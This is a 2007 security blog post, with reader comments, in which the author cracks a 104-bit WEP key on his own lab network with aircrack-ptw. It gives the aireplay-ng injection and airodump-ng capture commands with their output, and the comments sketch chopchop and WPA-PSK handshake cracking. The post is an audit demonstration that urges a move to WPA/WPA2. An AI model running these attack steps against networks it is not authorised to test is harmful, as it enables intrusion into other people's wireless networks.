April 05, 2007

What else do you need not to use WEP anymore?

Tonight (Yeah, I know, I should get more sleep!), while I was working on a wireless project you will hear about soon, I read the announcement of a paper titled "Breaking 104 bit WEP in less than 60 seconds". I couldn't wait to digest and test it, so impatiently, I prepared my wireless gear with the following setup:
  • A 104-bit WEP-based 802.11g wireless network, using a Linksys WRT54GL access point running OpenWrt.
  • A client laptop running Windows XP SP2 (with the Windows Wireless Update patch; come on, install it! ;)), using an Atheros wireless card.
  • An auditor laptop running BackTrack 2 Final and using an Atheros wireless card too.
My previous 104-bit WEP cracking record ever was set with the old aircrack suite collecting around 100,000 valid frames. Very impressive; I was very lucky that day! I only saw it once, and nowadays, it typically takes me a minimum of 400,000 frames.

I downloaded the tool, aircrack-ptw, that implements the paper improvements to derive the RC4 key used by WEP with as few as 40,000 frames (theoretically, around 60 seconds). I uncompressed and compiled the tool with a simple "make". However, before running "make" on BackTrack, be sure to edit the Makefile and move the "-lpcap" switch to the end of the gcc line for the "aircrack-ptw" target.

The Atheros cards use by default the madwifi-ng driver, so you need to follow step-by-step the pretty recent aircrack-ng WEP cracking tutorial (it contains all the specific details you need to test this). The tool needs the frames (PCAP files) to work, so you need to omit "--ivs" on Step 3, and instead of using the standard aircrack-ng, you must use the new aircrack-ptw tool (Step 5).

Let's see a summary of my setup and the results I got (...in less than 60 seconds?):
  • Step 1 - Put the card in monitor mode.
  • Step 2 - Create a fake authentication from the auditor laptop:
  • # aireplay-ng -1 0 -e TheMatrix -a 00:18:39:86:F2:55 -h 00:13:46:73:F2:99 ath0
    02:25:28 Sending Authentication Request
    02:25:28 Authentication successful
    02:25:28 Sending Association Request
    02:25:28 Association successful :-)
  • Step 3 - Run airodump to collect the traffic:
  • # airodump-ng -c 6 --bssid 00:18:39:86:F2:55 -w output ath0

    CH 6 ][ Elapsed: 1 min ][ 2007-04-05 02:29
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    00:18:39:86:F2:55 54 100 812 49547 585 6 48. WEP WEP TheMatrix

    BSSID STATION PWR Lost Packets Probes
    00:18:39:86:F2:55 00:13:46:73:F2:99 63 0 26891
    00:18:39:86:F2:55 00:13:46:98:03:BB 64 0 25522
  • Step 4 - Capture and inject traffic in the form of ARP packets:
  • # aireplay-ng -3 -b 00:18:39:86:F2:55 -h 00-13-46-73-F2-99 ath0
    Saving ARP requests in replay_arp-0405-022535.cap
    You should also start airodump-ng to capture replies.
    ...
  • Step 5 - Using my setup, injecting 40,000 valid frames took between 65-75 seconds. My first try revealed the key with near 46,000 frames:
  • # ./aircrack-ptw ../output-01.cap
    This is aircrack-ptw 1.0.0
    For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
    allocating a new table
    bssid = 00:18:39:86:F2:55 keyindex=0
    stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=45937
    Found key with len 13: CA FE CA FE CA FE CA FE CA FE CA FE CA
    The result was not bad, but the paper/tool promise was much better. My second try only needed 42,000, but this still meant more than 60 seconds:
    stats for bssid 00:18:39:86:F2:55  keyindex=0 packets=42648
    Third time's charm: 38653 frames and 59 seconds! ;)
    stats for bssid 00:18:39:86:F2:55  keyindex=0 packets=38653
Awesome results and advancements for auditing the security of WEP-based wireless networks!

<plug> You can learn about this and other advanced wireless security techniques in the upcoming SANS Assessing and Securing Wireless Networks course in Brussels, June 25-30, 2007. </plug>

What else do you need to switch to WPA/WPA2? Vendors have no excuse not to implement WPA in every wireless device in 2007!!

UPDATE: This was "Breaking 104-bit WEP in less than 60 seconds". Check the next blog entry for breaking 40-bit WEP in less than...

Labels:

4 Comments:

Anonymous Anonymous said...

Authentication and association ( step 2.) works fine in open-wep mode. It doesn't work on shared-wep mode ;)...In this case I performed Korek chopchop attack with aireplay-n -4 -h mac_address ath0, recover RC4 keystream, generate forged arp request with arpforge-ng;). Wep is unbreakable with Airdefense wep cloaking tehnology http://www.tmcnet.com/usubmit/2007/04/02/2457867.htm .WPA-PSK(TKIP) and WPA2-PSK(AES)is also breakable...;) with aireplay-ng -0 10 bla,bla I performed deauthentication and deasssociation, capture WPA challenge/response authentication packets wits airodump , and finally crack the challenge/response with cowpatty or aircrack-ng -a 2....genpmk drasticaly help to precompute PMK to crack WPA(with cowpatty).

1:45 PM  
Blogger Raul Siles said...

Hi anon,
Thanks for your comment!

It is true that the example only works for open-auth WEP-based networks. If the WEP network uses shared authentication, then you need to obtain PRGA in order to encrypt the challenge sent by the AP. There are multiple ways of getting PRGA, one is the Korek chopchop attack you mention, but you can also use a WEP-based fragmentation attack or the simplest method, wait for (or force) a valid client to connect to the network: airodump-ng will collect the PRGA required for you ;)

If you are interested on the details, check the aircrack-ng tutorial called "How to do shared key fake authentication ?".

Re the recently announced Airdefense WEP Cloaking feature, I strongly suggest everybody to read the following article by my good friend Joshua Wright, "AirDefense Perpetuates Flawed Protocols". You cannot secure WEP!! There are so many flaws on it that the smarter option for real security is to switch to WPA/WPA2. I know there are environments were this change would be too costly, but then, accept that a dedicated attacker will be able to break in.

Finally, re WPA/WPA2-PSK cracking, the current attack methods are based on dictionary-attacks, trying to guess the pre-shared key if it is based on a dictionary word or it's guessable. This is why the 802.11i specification recommends passphrases of 20 chars or more, and I suggest to use 64-char random passphrases, such as the ones generated by GRC's password generator. If you don't trust Steve Gibson, mix the characters obtained from multiple invocations ;)

2:12 PM  
Anonymous Anonymous said...

Good article by Joshua but I think he is agreeing that WEP cloaking works in at least one case. Or, is it really possible to decipher inspite of WEP cloaking?

10:22 AM  
Blogger Raul Siles said...

The real situation nowadays is that we are all waiting to have access to a packet capture for the WEP Cloaking countermeasures, because, it seems relatively easy to discern between the real WEP packets and the ones generated by the protection system (sequence numbers, signal levels...).

It seems that even AirDefense comments on the SF WiFiSec list a few months ago ratified that, because they clarified WEP Cloaking is an extra layer of security for its WiFi defense in-depth architecture.

11:03 AM  

Post a Comment

<< Home